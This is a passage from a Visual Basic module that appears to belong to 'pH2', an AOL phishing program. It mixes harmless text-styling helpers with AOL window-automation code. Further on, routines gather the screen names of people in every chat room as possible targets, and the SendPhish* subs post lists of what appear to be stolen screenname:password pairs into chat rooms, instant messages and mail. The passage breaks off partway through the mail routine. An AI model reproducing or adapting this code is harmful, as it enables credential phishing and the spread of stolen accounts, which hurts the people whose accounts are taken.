  8682. Public Function Text_Backwards(Text As String) As String
  8683. 'makes text appear backwards
  8684. Dim bLong As Long, bChr As String, bFull As String
  8685.  
  8686. For bLong& = 1 To Len(Text$)
  8687. bChr$ = Mid(Text$, bLong&, 1)
  8688. bFull$ = bChr$ + bFull$
  8689. Next bLong&
  8690.  
  8691. Text_Backwards = bFull$
  8692. End Function
  8693.  
  8694. Public Function Text_Bold(Text As String) As String
  8695. 'makes first letter of every word
  8696. 'in a sentence bold.
  8697. Dim tLong As Long, tChr As String, tFull As String
  8698.  
  8699. For tLong& = 1 To Len(Text$)
  8700. tChr$ = Mid(Text$, tLong&, 1)
  8701.  
  8702. If tLong& = 1 Then tChr$ = "<b>" + tChr$ + "</b>"
  8703.  
  8704. If tChr$ = " " Then
  8705. tChr$ = Mid(Text$, tLong&, 2)
  8706. tChr$ = " <b>" + Right(tChr$, 1) + "</b>"
  8707. tLong& = tLong& + 1
  8708. End If
  8709.  
  8710. tFull$ = tFull$ + tChr$
  8711. Next tLong&
  8712.  
  8713. Text_Bold = tFull$
  8714. End Function
  8715.  
  8716. Public Function Text_Elite(Text As String) As String
  8717. 'makes text 'elite'
  8718. 'example how to use it:
  8719. 'Call ChatSend(Text_Elite("heyhowzitgoin"))
  8720. Dim eLong As Long, eChr As String, eFull As String
  8721.  
  8722. Text$ = LCase(Text$)
  8723.  
  8724. For eLong& = 1 To Len(Text$)
  8725. eChr$ = Mid(Text$, eLong&, 1)
  8726. If eChr$ = "a" Then eChr$ = "à"
  8727. If eChr$ = "A" Then eChr$ = "Á"
  8728. If eChr$ = "b" Then eChr$ = "/›"
  8729. If eChr$ = "B" Then eChr$ = "ß"
  8730. If eChr$ = "c" Then eChr$ = "ç"
  8731. If eChr$ = "C" Then eChr$ = "©"
  8732. If eChr$ = "d" Then eChr$ = "‹/"
  8733. If eChr$ = "D" Then eChr$ = "Ð"
  8734. If eChr$ = "e" Then eChr$ = "è"
  8735. If eChr$ = "E" Then eChr$ = "È"
  8736. If eChr$ = "f" Then eChr$ = "ƒ"
  8737. If eChr$ = "h" Then eChr$ = "H"
  8738. If eChr$ = "H" Then eChr$ = "H"
  8739. If eChr$ = "i" Then eChr$ = "ì"
  8740. If eChr$ = "I" Then eChr$ = "Ì"
  8741. If eChr$ = "k" Then eChr$ = "/‹"
  8742. If eChr$ = "K" Then eChr$ = "/<"
  8743. If eChr$ = "l" Then eChr$ = "L"
  8744. If eChr$ = "L" Then eChr$ = "£"
  8745. If eChr$ = "m" Then eChr$ = "m"
  8746. If eChr$ = "M" Then eChr$ = "M"
  8747. If eChr$ = "n" Then eChr$ = "ñ"
  8748. If eChr$ = "N" Then eChr$ = "N"
  8749. If eChr$ = "o" Then eChr$ = "ø"
  8750. If eChr$ = "O" Then eChr$ = "Ø"
  8751. If eChr$ = "p" Then eChr$ = "p"
  8752. If eChr$ = "P" Then eChr$ = "Þ"
  8753. If eChr$ = "R" Then eChr$ = "®"
  8754. If eChr$ = "s" Then eChr$ = "š"
  8755. If eChr$ = "S" Then eChr$ = "§"
  8756. If eChr$ = "T" Then eChr$ = "†"
  8757. If eChr$ = "u" Then eChr$ = "ù"
  8758. If eChr$ = "U" Then eChr$ = "Ú"
  8759. If eChr$ = "V" Then eChr$ = "\/"
  8760. If eChr$ = "w" Then eChr$ = "w"
  8761. If eChr$ = "W" Then eChr$ = "W"
  8762. If eChr$ = "x" Then eChr$ = "×"
  8763. If eChr$ = "X" Then eChr$ = "›‹"
  8764. If eChr$ = "y" Then eChr$ = "ý"
  8765. If eChr$ = "Y" Then eChr$ = "Ý"
  8766. If eChr$ = "1" Then eChr$ = "¹"
  8767. If eChr$ = "2" Then eChr$ = "²"
  8768. If eChr$ = "3" Then eChr$ = "³"
  8769. If eChr$ = "0" Then eChr$ = "°"
  8770. If eChr$ = "!" Then eChr$ = "¡"
  8771. If eChr$ = "?" Then eChr$ = "¿"
  8772. eFull$ = eFull$ + eChr$
  8773. Next eLong&
  8774. Text_Elite = eFull$
  8775. End Function
  8776. Public Function Text_UCASE(Text As String) As String
  8777. 'makes text 'CAPS'
  8778. 'example how to use it:
  8779. 'Call ChatSend(Text_Ucase("heyhowzitgoin"))
  8780. Dim eLong As Long, eChr As String, eFull As String
  8781.  
  8782. Text$ = LCase(Text$)
  8783.  
  8784. For eLong& = 1 To Len(Text$)
  8785. eChr$ = Mid(Text$, eLong&, 1)
  8786. If eChr$ = "A" Then eChr$ = "A"
  8787. If eChr$ = "A" Then eChr$ = "A"
  8788. If eChr$ = "B" Then eChr$ = "B"
  8789. If eChr$ = "B" Then eChr$ = "B"
  8790. If eChr$ = "C" Then eChr$ = "C"
  8791. If eChr$ = "C" Then eChr$ = "C"
  8792. If eChr$ = "D" Then eChr$ = "D"
  8793. If eChr$ = "D" Then eChr$ = "D"
  8794. If eChr$ = "E" Then eChr$ = "E"
  8795. If eChr$ = "E" Then eChr$ = "E"
  8796. If eChr$ = "F" Then eChr$ = "F"
  8797. If eChr$ = "H" Then eChr$ = "H"
  8798. If eChr$ = "H" Then eChr$ = "H"
  8799. If eChr$ = "I" Then eChr$ = "I"
  8800. If eChr$ = "I" Then eChr$ = "I"
  8801. If eChr$ = "K" Then eChr$ = "K"
  8802. If eChr$ = "K" Then eChr$ = "K"
  8803. If eChr$ = "L" Then eChr$ = "L"
  8804. If eChr$ = "L" Then eChr$ = "L"
  8805. If eChr$ = "M" Then eChr$ = "M"
  8806. If eChr$ = "M" Then eChr$ = "M"
  8807. If eChr$ = "N" Then eChr$ = "N"
  8808. If eChr$ = "N" Then eChr$ = "N"
  8809. If eChr$ = "O" Then eChr$ = "O"
  8810. If eChr$ = "O" Then eChr$ = "O"
  8811. If eChr$ = "P" Then eChr$ = "P"
  8812. If eChr$ = "P" Then eChr$ = "P"
  8813. If eChr$ = "R" Then eChr$ = "R"
  8814. If eChr$ = "S" Then eChr$ = "S"
  8815. If eChr$ = "S" Then eChr$ = "S"
  8816. If eChr$ = "T" Then eChr$ = "T"
  8817. If eChr$ = "U" Then eChr$ = "U"
  8818. If eChr$ = "U" Then eChr$ = "U"
  8819. If eChr$ = "V" Then eChr$ = "V"
  8820. If eChr$ = "W" Then eChr$ = "W"
  8821. If eChr$ = "W" Then eChr$ = "W"
  8822. If eChr$ = "X" Then eChr$ = "X"
  8823. If eChr$ = "X" Then eChr$ = "X"
  8824. If eChr$ = "Y" Then eChr$ = "Y"
  8825. If eChr$ = "Y" Then eChr$ = "Y"
  8826. If eChr$ = "1" Then eChr$ = "¹"
  8827. If eChr$ = "2" Then eChr$ = "²"
  8828. If eChr$ = "3" Then eChr$ = "³"
  8829. If eChr$ = "0" Then eChr$ = "°"
  8830. If eChr$ = "!" Then eChr$ = "¡"
  8831. If eChr$ = "?" Then eChr$ = "¿"
  8832. eFull$ = eFull$ + eChr$
  8833. Next eLong&
  8834. Text_UCASE = eFull$
  8835. End Function
  8836. Public Function Text_Hacker(Text As String) As String
  8837. '"hacks" the text
  8838. 'all it does is make every vowel lcase and every consonant ucase
  8839. Dim hLong As Long, hFull As String
  8840. Dim hChr As String, hChr2 As String
  8841.  
  8842. Text$ = UCase(Text$)
  8843. For hLong& = 1 To Len(Text$)
  8844. hChr$ = Mid(Text$, hLong&, 1)
  8845. If hChr$ = "A" Then
  8846. hChr$ = "a"
  8847. ElseIf hChr$ = "E" Then
  8848. hChr$ = "e"
  8849. ElseIf hChr$ = "I" Then
  8850. hChr$ = "i"
  8851. ElseIf hChr$ = "O" Then
  8852. hChr$ = "o"
  8853. ElseIf hChr$ = "U" Then
  8854. hChr$ = "u"
  8855. 'ElseIf hChr$ = "S" Then
  8856. ' hChr$ = "s"
  8857. End If
  8858. If hLong = 3 Then
  8859. If hChr$ = "P" Then
  8860. hChr$ = "p"
  8861. End If
  8862. End If
  8863. hFull$ = hFull$ + hChr$
  8864. Next hLong&
  8865. Text_Hacker = hFull$
  8866. End Function
  8867.  
  8868. Public Function Text_LAG(Text As String) As String
  8869. 'converts string into a lag string
  8870. Dim lLong As Long, lChr As String, lFull As String
  8871.  
  8872. For lLong& = 1 To Len(Text$)
  8873. lChr$ = Mid(Text$, lLong&, 1)
  8874. lChr$ = "<html></html><html></html>" + lChr$
  8875. lFull$ = lFull$ + lChr$
  8876. Next lLong&
  8877.  
  8878. Text_LAG = lFull$
  8879. End Function
  8880.  
  8881. Public Function Text_PigLatin(Text As String) As String
  8882. 'this is pretty nice, i should make some
  8883. 'error checks [for vowels and what not], but
  8884. 'i'm really lazy, maybe later.
  8885. Dim iSpace As Long, iNext As Long
  8886. Dim strTemp As String, strTxt As String
  8887. Dim strFront As String, strBack As String
  8888. Dim strFull As String
  8889.  
  8890. strTxt$ = Text$
  8891. If Right(strTxt$, 1) <> " " Then
  8892. strTxt$ = strTxt$ + " "
  8893. End If
  8894.  
  8895. iSpace& = InStr(1, strTxt$, " ")
  8896. strTemp$ = Left(strTxt$, iSpace& - 1)
  8897. 'word check
  8898. If Len(strTemp$) > 1 Then
  8899. strFront$ = Mid(strTemp$, 1, 1)
  8900. strBack$ = Mid(strTemp$, 2, Len(strTemp$) - 1)
  8901. strTemp$ = strBack$ + "-" + strFront$ + "ay"
  8902. End If
  8903. strFull$ = strTemp$
  8904.  
  8905. iNext& = iSpace
  8906. Do While iNext& <> 0&
  8907. iSpace& = iNext&
  8908. iNext& = InStr(iSpace& + 1, strTxt$, " ")
  8909. If iNext& <> 0& Then
  8910. strTemp$ = Mid(strTxt$, iSpace& + 1, iNext& - iSpace& - 1)
  8911. 'word check
  8912. If Len(strTemp$) > 1 Then
  8913. strFront$ = Mid(strTemp$, 1, 1)
  8914. strBack$ = Mid(strTemp$, 2, Len(strTemp$) - 1)
  8915. strTemp$ = strBack$ + "-" + strFront$ + "ay"
  8916. End If
  8917. strFull$ = strFull$ + " " + strTemp$
  8918. End If
  8919. Loop
  8920. Text_PigLatin$ = strFull$
  8921. End Function
  8922.  
  8923. Public Sub Text_TypeWriter(Text As String, lbl As Label)
  8924. 'makes text type slowly into a label
  8925. Dim i As Long
  8926.  
  8927. For i = 1 To Len(Text$)
  8928. lbl.Caption = Left(Text$, i)
  8929. pause (0.001)
  8930. Next i
  8931. lbl.Caption = Text$
  8932. End Sub
  8933. Public Function Text_Wavy(Text As String) As String
  8934. 'uses html to make text wavy.
  8935. Dim wLong As Long, wFull As String, wChr As String
  8936. Dim wChr2 As String, wChr3 As String, wChr4 As String
  8937.  
  8938. For wLong& = 1 To Len(Text$) Step 4
  8939. wChr$ = Mid(Text$, wLong&, 1)
  8940. wChr2$ = Mid(Text$, wLong& + 1, 1)
  8941. wChr3$ = Mid(Text$, wLong& + 2, 1)
  8942. wChr4$ = Mid(Text$, wLong& + 3, 1)
  8943. wFull$ = wFull$ + "<sup>" + wChr$ + "</sup>" + wChr2$ + "<sub>" + wChr3$ + "</sub>" + wChr4$
  8944. Next wLong&
  8945.  
  8946. Text_Wavy = wFull$
  8947. End Function
  8948.  
  8949. Public Sub ToolKeyword(KW As String)
  8950. 'uses the 'keyword' icon on aol's toolbar
  8951. 'to go to a keyword.
  8952. Dim aol As Long, mdi As Long, tb As Long, TBar As Long, tPre As Long
  8953. Dim tIcon As Long, i As Long, Count As Long, StartTime As Double
  8954. Dim KWWin As Long, KWEdit As Long, kCombo As Long, kEdit As Long
  8955.  
  8956. aol& = FindWindow("AOL Frame25", vbNullString)
  8957. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  8958. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  8959. TBar& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  8960. kCombo& = FindWindowEx(TBar&, 0&, "_AOL_Combobox", vbNullString)
  8961. kEdit& = FindWindowEx(kCombo&, 0&, "Edit", vbNullString)
  8962.  
  8963. tIcon& = FindWindowEx(TBar&, 0&, "_AOL_Icon", vbNullString)
  8964. For i = 1 To 19
  8965. tIcon& = FindWindowEx(TBar&, tIcon&, "_AOL_Icon", vbNullString)
  8966. Next i
  8967.  
  8968. Call RunMenuByString("Incoming Text")
  8969.  
  8970. Call SendMessageByString(kEdit&, WM_SETTEXT, 0&, KW$)
  8971.  
  8972. Do
  8973. DoEvents
  8974. Call SendMessage(tIcon&, WM_LBUTTONDOWN, 0&, 0&)
  8975. Call SendMessage(tIcon&, WM_LBUTTONUP, 0&, 0&)
  8976. StartTime = Timer
  8977. Do While Timer - StartTime < 0.3
  8978. DoEvents
  8979. KWWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Keyword")
  8980. KWEdit& = FindWindowEx(KWWin&, 0&, "_AOL_Edit", vbNullString)
  8981. If KWWin& <> 0& And KWEdit& <> 0& Then GoTo FoundKW
  8982. Loop
  8983. Loop Until KWWin& <> 0& And KWEdit& <> 0&
  8984.  
  8985. FoundKW:
  8986.  
  8987. Call SendMessageByString(KWEdit&, WM_SETTEXT, 0&, KW$)
  8988. Call SendMessageLong(KWEdit&, WM_CHAR, ENTER_KEY, 0&)
  8989.  
  8990. End Sub
  8991.  
  8992. Public Function TrimChr(tText As String, tChr As String) As String
  8993. 'removes a character in a string
  8994. Dim tLong As Long, fChr As String, tFull As String
  8995.  
  8996. For tLong& = 1 To Len(tText$)
  8997. fChr$ = Mid(tText$, tLong&, 1)
  8998. If fChr$ = tChr Then fChr$ = ""
  8999. tFull$ = tFull$ + fChr$
  9000. Next tLong&
  9001.  
  9002. TrimChr$ = tFull$
  9003. End Function
  9004.  
  9005. Public Function TrimSpaces(Text As String) As String
  9006. 'removes any spaces from a string
  9007. Dim cLong As Long, cChar As String, cFull As String
  9008.  
  9009. If Trim(Text$) = "" Then
  9010. TrimSpaces = ""
  9011. Exit Function
  9012. End If
  9013.  
  9014. For cLong& = 1 To Len(Text$)
  9015. cChar$ = Mid(Text$, cLong&, 1)
  9016. If cChar$ = " " Then cChar$ = ""
  9017. cFull$ = cFull$ + cChar$
  9018. Next cLong&
  9019.  
  9020. TrimSpaces = cFull$
  9021. End Function
  9022.  
  9023. Public Sub UnUpchat()
  9024. 'turns upchat off
  9025. Dim aol As Long
  9026.  
  9027. aol& = FindWindow("AOL Frame25", vbNullString)
  9028.  
  9029. Call ShowWindow(aol&, SW_MINIMIZE)
  9030. Call ShowWindow(aol&, SW_MAXIMIZE)
  9031.  
  9032. End Sub
  9033.  
  9034. Public Sub upchat()
  9035. 'turns upchat on
  9036. Dim uWin As Long
  9037.  
  9038. If AOLVersion = "2.5" Then
  9039. Call UpChat25
  9040. Exit Sub
  9041. End If
  9042.  
  9043. uWin& = FindUploadWin
  9044. If uWin& = 0& Then Exit Sub
  9045.  
  9046. Call ShowWindow(uWin&, SW_HIDE)
  9047. Call ShowWindow(uWin&, SW_MINIMIZE)
  9048. Call ActivateAOL
  9049. End Sub
  9050.  
  9051. Public Sub UpChat25()
  9052. 'turns upchat on for 2.5
  9053. Dim hRect As RECT, aol As Long, mdi As Long, Modal As Long
  9054. aol& = FindWindow("AOL Frame25", vbNullString)
  9055. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  9056. Modal& = FindWindow("_AOL_Modal", vbNullString) 'FindUploadWin
  9057.  
  9058. If Modal& = 0& Then Exit Sub
  9059. Call EnableWindow(Modal&, 0)
  9060. aol& = FindWindow("AOL Frame25", vbNullString)
  9061. Call EnableWindow(aol&, 1&)
  9062. Call ShowWindow(FindMail&, SW_MINIMIZE)
  9063. 'Call SendMessageByString(Modal&, WM_SETTEXT, 0&, "File Transfer - %86")
  9064. If Modal& <> 0& Then
  9065. MoveWindow Modal&, 20, -4, 150, 5, 1
  9066. End If
  9067.  
  9068. GetWindowRect Modal&, hRect
  9069. End Sub
  9070.  
  9071. Public Function UpChatPercent() As String
  9072. 'returns the upchat percent
  9073. Dim uWin As Long, uString As String, uPercent As Long
  9074. Dim UploadPercent As String
  9075.  
  9076. uWin& = FindUploadWin
  9077. uString$ = GetText(uWin&)
  9078.  
  9079. uPercent& = InStr(1, uString$, "%")
  9080.  
  9081. UploadPercent$ = Right(uString$, Len(uString$) - uPercent&)
  9082. End Function
  9083.  
  9084.  
  9085.  
  9086. Public Sub WaitForListToLoad(hWndList As Long)
  9087. 'waits for list from another win to load
  9088. Dim wCount1 As Long, wCount2 As Long, wCount3 As Long
  9089.  
  9090. Do
  9091. DoEvents
  9092. wCount1& = SendMessage(hWndList&, LB_GETCOUNT, 0&, 0&)
  9093. pause (0.4)
  9094. wCount2& = SendMessage(hWndList&, LB_GETCOUNT, 0&, 0&)
  9095. pause (0.4)
  9096. wCount3& = SendMessage(hWndList&, LB_GETCOUNT, 0&, 0&)
  9097. Loop Until wCount1& = wCount3&
  9098.  
  9099. End Sub
  9100.  
  9101. Public Sub WaitForTextToLoad(hWndTxt As Long)
  9102. 'waits for text from another win to load
  9103. Dim wString1 As String, wString2 As String, wString3 As String
  9104.  
  9105. Do
  9106. DoEvents
  9107. wString1$ = GetText(hWndTxt&)
  9108. pause (0.4)
  9109. wString2$ = GetText(hWndTxt&)
  9110. pause (0.4)
  9111. wString3$ = GetText(hWndTxt&)
  9112. pause (0.4)
  9113. Loop Until wString1$ = wString3$
  9114.  
  9115. End Sub
  9116.  
  9117. Public Sub WhosChattingGather(Amount As Long, list As ListBox)
  9118. 'goes through every category and every
  9119. 'chat in those categories
  9120. Dim lngLeft As Long, lngRight As Long
  9121.  
  9122. 'If Amount& >= List.ListCount Then Exit Sub
  9123.  
  9124. Call findachat
  9125.  
  9126. For lngLeft& = 1 To WhosChattingLCount
  9127. For lngRight& = 0 To WhosChattingRCount - 1
  9128. Call WhosChattingGatherRight(lngRight&, list)
  9129. If list.ListCount >= Amount& Then GoTo AfterGather
  9130. pause (8)
  9131. Next lngRight&
  9132. Call WhosChattingGatherLeft(lngLeft&)
  9133. pause (1)
  9134. Next lngLeft
  9135.  
  9136. AfterGather:
  9137.  
  9138. Do
  9139. DoEvents
  9140. If list.ListCount = Amount& Then Exit Do
  9141. list.RemoveItem list.ListCount - 1
  9142. Loop
  9143.  
  9144. End Sub
  9145.  
  9146. Public Sub WhosChattingGatherLeft(Index As Long)
  9147. 'alot like whoschattinggatherright
  9148. 'but this one will only skip to an index
  9149. 'on the Left listbox of aol's 'Find A Chat' window
  9150. Dim aol As Long, mdi As Long, fWin As Long, fList As Long, fCount As Long
  9151. Dim fIcon As Long, lngicon As Long
  9152. Dim wWin As Long, wList As Long, wCount As Long
  9153. Dim firstcount As Long, SecondCount As Long
  9154.  
  9155. aol& = FindWindow("AOL Frame25", vbNullString)
  9156. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  9157.  
  9158. fWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Find a Chat")
  9159. fList& = FindWindowEx(fWin&, 0&, "_AOL_Listbox", vbNullString)
  9160.  
  9161. Call SendMessage(fList&, LB_SETCURSEL, Index&, 0&)
  9162. Call PostMessage(fList&, WM_LBUTTONDBLCLK, 0&, 0&)
  9163.  
  9164. pause (4)
  9165. End Sub
  9166.  
  9167. Public Sub WhosChattingGatherRight(Index As Long, list As ListBox)
  9168. 'this uses the Find A Chat window on aol
  9169. 'it will click a certain list item [using Index]
  9170. 'and then it will click the "who's chatting" icon,
  9171. 'it will wait for the window to come up, and it
  9172. 'will add the screen names to a listbox [List]
  9173. '
  9174. 'i wouldn't try to use this sub
  9175. 'just stick to the "WhosChattingGather" sub -=D
  9176. Dim aol As Long, mdi As Long, fWin As Long, fList As Long, fCount As Long
  9177. Dim fIcon As Long, lngicon As Long
  9178. Dim wWin As Long, wList As Long, wCount As Long
  9179. Dim mWin As Long, mBut As Long, mSta As Long, mStr As String
  9180.  
  9181. aol& = FindWindow("AOL Frame25", vbNullString)
  9182. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  9183.  
  9184. fWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Find a Chat")
  9185. fList& = FindWindowEx(fWin&, 0&, "_AOL_Listbox", vbNullString)
  9186. fList& = FindWindowEx(fWin&, fList&, "_AOL_Listbox", vbNullString)
  9187.  
  9188. fIcon& = FindWindowEx(fWin&, 0&, "_AOL_Icon", vbNullString)
  9189. For lngicon = 1 To 8
  9190. fIcon& = FindWindowEx(fWin&, fIcon&, "_AOL_Icon", vbNullString)
  9191. Next lngicon
  9192.  
  9193. GatherSameRoom:
  9194.  
  9195. Call SendMessage(fList&, LB_SETCURSEL, Index&, 0&)
  9196.  
  9197. Call SendMessage(fIcon&, WM_LBUTTONDOWN, 0&, 0&)
  9198. Call SendMessage(fIcon&, WM_LBUTTONUP, 0&, 0&)
  9199.  
  9200. Do
  9201. DoEvents
  9202. wWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Who's Chatting")
  9203. wList& = FindWindowEx(wWin&, 0&, "_AOL_Listbox", vbNullString)
  9204. wCount& = SendMessage(wList&, LB_GETCOUNT, 0&, 0&)
  9205.  
  9206. mWin& = FindWindow("#32770", "America Online")
  9207. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  9208. mSta& = FindWindowEx(mWin&, 0&, "Static", vbNullString)
  9209. mSta& = FindWindowEx(mWin&, mSta&, "Static", vbNullString)
  9210. mStr$ = GetText(mSta&)
  9211. Loop Until wWin& <> 0& And wList& <> 0& And wCount& <> 0& Or mWin& <> 0& And mBut& <> 0& And mStr$ <> ""
  9212.  
  9213. If mWin& <> 0& Then
  9214. If InStr(1, mStr$, "requests too quickly.") <> 0& Then
  9215. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  9216. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  9217. pause (GetFromINI("ph2", "over limit pause", App.Path + "\ph2.ini"))
  9218. GoTo GatherSameRoom
  9219. ElseIf InStr(1, mStr$, "empty") <> 0& Then
  9220. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  9221. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  9222. pause (GetFromINI("ph2", "empty pause", App.Path + "\ph2.ini"))
  9223. End If
  9224. Exit Sub
  9225. End If
  9226.  
  9227. Call AddAOLList(wList&, list)
  9228.  
  9229. Call PostMessage(wWin&, WM_CLOSE, 0&, 0&)
  9230.  
  9231. Do
  9232. DoEvents
  9233. wWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Who's Chatting")
  9234. Loop Until wWin& = 0&
  9235. End Sub
  9236.  
  9237. Public Function WhosChattingLCount() As Long
  9238. 'returns the listcount of the
  9239. 'left listbox on aol's find a chat window
  9240. Dim aol As Long, mdi As Long, fWin As Long, fList As Long
  9241.  
  9242. aol& = FindWindow("AOL Frame25", vbNullString)
  9243. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  9244.  
  9245. fWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Find a Chat")
  9246. fList& = FindWindowEx(fWin&, 0&, "_AOL_Listbox", vbNullString)
  9247.  
  9248. WhosChattingLCount = SendMessage(fList&, LB_GETCOUNT, 0&, 0&)
  9249. End Function
  9250.  
  9251. Public Function WhosChattingRCount() As Long
  9252. 'returns the listcount of the
  9253. 'right listbox on aol's find a chat window
  9254. Dim aol As Long, mdi As Long, fWin As Long, fList As Long
  9255.  
  9256. aol& = FindWindow("AOL Frame25", vbNullString)
  9257. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  9258.  
  9259. fWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Find a Chat")
  9260. fList& = FindWindowEx(fWin&, 0&, "_AOL_Listbox", vbNullString)
  9261. fList& = FindWindowEx(fWin&, fList&, "_AOL_Listbox", vbNullString)
  9262.  
  9263. WhosChattingRCount = SendMessage(fList&, LB_GETCOUNT, 0&, 0&)
  9264. End Function
  9265.  
  9266. Public Sub WriteToINI(AppName As String, KeyName As String, Value As String, FileName As String)
  9267. 'writes to ini
  9268. 'i might write an example
  9269. 'on how to use ini's
  9270. 'a little bit later
  9271. Call WritePrivateProfileString(AppName$, LCase$(KeyName$), Value$, FileName$)
  9272. End Sub
  9273.  
  9274. Public Sub SendPhishChatAll(List1 As ListBox, List2 As ListBox, Typee As String)
  9275. Dim i As Long
  9276.  
  9277. Call ChatSend("• pH2 · Scrolling all " + Typee$ + " accts")
  9278.  
  9279. Pause2 (0.6)
  9280.  
  9281. For i = 0 To List1.ListCount - 1
  9282. Call ChatSend("• pH2 · " & (i + 1) & " · " + List1.list(i) + ":" + List2.list(i) + "")
  9283. Pause2 (0.6)
  9284. Next i
  9285.  
  9286. Call ChatSend("• pH2 · Scrolled all " + Typee$ + " accts")
  9287. End Sub
  9288.  
  9289. Public Sub SendSNChatAll(List1 As ListBox, Typee As String)
  9290. Dim i As Long
  9291.  
  9292. Call ChatSend("• pH2 · Scrolling all " + Typee$ + " sns")
  9293.  
  9294. Pause2 (0.6)
  9295.  
  9296. For i = 0 To List1.ListCount - 1
  9297. Call ChatSend("• pH2 · " & (i + 1) & " · " + List1.list(i) + "")
  9298. Pause2 (0.6)
  9299. Next i
  9300.  
  9301. Call ChatSend("• pH2 · Scrolled all " + Typee$ + " sns")
  9302. End Sub
  9303.  
  9304. Public Sub SendPhishChatString(List1 As ListBox, List2 As ListBox, pString As String, Typee As String)
  9305. Dim i As Long
  9306.  
  9307. Call ChatSend("• pH2 · Scrolling string: " + pString$)
  9308.  
  9309. For i = 0 To List1.ListCount - 1
  9310. If InStr(1, List1.list(i), pString$) <> 0& Then
  9311. Call ChatSend("• pH2 · " + List1.list(i) + ":" + List2.list(i) + "")
  9312. Pause2 (0.6)
  9313. End If
  9314. Next i
  9315.  
  9316. Call ChatSend("• pH2 · Scrolled string: " + pString$)
  9317. End Sub
  9318.  
  9319. Public Sub SendSNChatString(List1 As ListBox, pString As String, Typee As String)
  9320. Dim i As Long
  9321.  
  9322. Call ChatSend("• pH2 · Scrolling string: " + pString$)
  9323.  
  9324. For i = 0 To List1.ListCount - 1
  9325. If InStr(1, List1.list(i), pString$) <> 0& Then
  9326. Call ChatSend("• pH2 · " + List1.list(i) + "")
  9327. Pause2 (0.6)
  9328. End If
  9329. Next i
  9330.  
  9331. Call ChatSend("• pH2 · Scrolled string: " + pString$)
  9332. End Sub
  9333.  
  9334. Public Sub SendPhishChatSelected(List1 As ListBox, List2 As ListBox, Typee As String)
  9335.  
  9336. If List1.ListIndex = -1 Then Exit Sub
  9337.  
  9338. Call ChatSend("• pH2 · Scrolling " + Typee$)
  9339. Call ChatSend("• pH2 · " + List1.list(List1.ListIndex) + ":" + List2.list(List2.ListIndex) + "")
  9340. End Sub
  9341.  
  9342. Public Sub SendSNChatSelected(List1 As ListBox, Typee As String)
  9343.  
  9344. If List1.ListIndex = -1 Then Exit Sub
  9345.  
  9346. Call ChatSend("• pH2 · scrolling " + Typee$ + " sn")
  9347. Call ChatSend("• pH2 · " + List1.list(List1.ListIndex) + "")
  9348. End Sub
  9349.  
  9350. Public Sub SendPhishChatNumber(List1 As ListBox, List2 As ListBox, number As Long, Typee As String)
  9351. Dim i As Long
  9352.  
  9353. Call ChatSend("• pH2 · Scrolling number: " & number&)
  9354.  
  9355. For i = 0 To List1.ListCount - 1
  9356. Call ChatSend("• " & (i + 1) & " · " & List1.list(i) & ":" & List2.list(i) & "")
  9357. Pause2 (0.6)
  9358. If (i + 1) = number& Then Exit For
  9359. Next i
  9360. Call ChatSend("• pH2 · Scrolled number: " & number&)
  9361. End Sub
  9362.  
  9363. Public Sub SendSNChatNumber(List1 As ListBox, number As Long, Typee As String)
  9364. Dim i As Long
  9365.  
  9366. Call ChatSend("• pH2 · Scrolling number: " & number&)
  9367.  
  9368. For i = 0 To List1.ListCount - 1
  9369. Call ChatSend("• " & (i + 1) & " · " & List1.list(i) & "")
  9370. Pause2 (0.6)
  9371. If (i + 1) = number& Then Exit For
  9372. Next i
  9373. Call ChatSend("• pH2 · Scrolled number: " & number&)
  9374. End Sub
  9375.  
  9376. Public Sub SendPhishIMAll(List1 As ListBox, List2 As ListBox, screenname As String, Typee As String)
  9377. Dim imString As String, i As Long
  9378. imString$ = "• pH2 · All " + Typee$ + " accts"
  9379.  
  9380. For i = 0 To List1.ListCount - 1
  9381. imString$ = imString$ + vbCrLf + "• " & (i + 1) & " · " & List1.list(i) & ":" & List2.list(i) & ""
  9382. Next i
  9383.  
  9384. Call InstantMessage(screenname$, imString$)
  9385. End Sub
  9386.  
  9387. Public Sub SendSNIMAll(List1 As ListBox, screenname As String, Typee As String)
  9388. Dim imString As String, i As Long
  9389. imString$ = "• pH2 · All " + Typee$ + " sns"
  9390.  
  9391. For i = 0 To List1.ListCount - 1
  9392. imString$ = imString$ + vbCrLf + "• " & (i + 1) & " · " & List1.list(i) & ""
  9393. Next i
  9394.  
  9395. Call InstantMessage(screenname$, imString$)
  9396. End Sub
  9397.  
  9398. Public Sub SendPhishIMSelected(List1 As ListBox, List2 As ListBox, screenname As String, Typee As String)
  9399. Dim i As Long
  9400.  
  9401. i = List1.ListIndex
  9402. If i = -1 Then Exit Sub
  9403.  
  9404. Call InstantMessage(screenname$, "• pH2 · " + Typee$ + " · " & List1.list(i) & ":" & List2.list(i) & "")
  9405. End Sub
  9406.  
  9407. Public Sub SendSNIMSelected(List1 As ListBox, screenname As String, Typee As String)
  9408. Dim i As Long
  9409.  
  9410. i = List1.ListIndex
  9411. If i = -1 Then Exit Sub
  9412.  
  9413. Call InstantMessage(screenname$, "• pH2 · " + Typee$ + " · " & List1.list(i) & "")
  9414. End Sub
  9415.  
  9416.  
  9417.  
  9418. Public Sub SendPhishMailAll(List1 As ListBox, List2 As ListBox, screenname As String, Typee As String)
  9419. Dim imString As String, i As Long
  9420. imString$ = "• pH2 · All " + Typee$ + " accts"
  9421.  
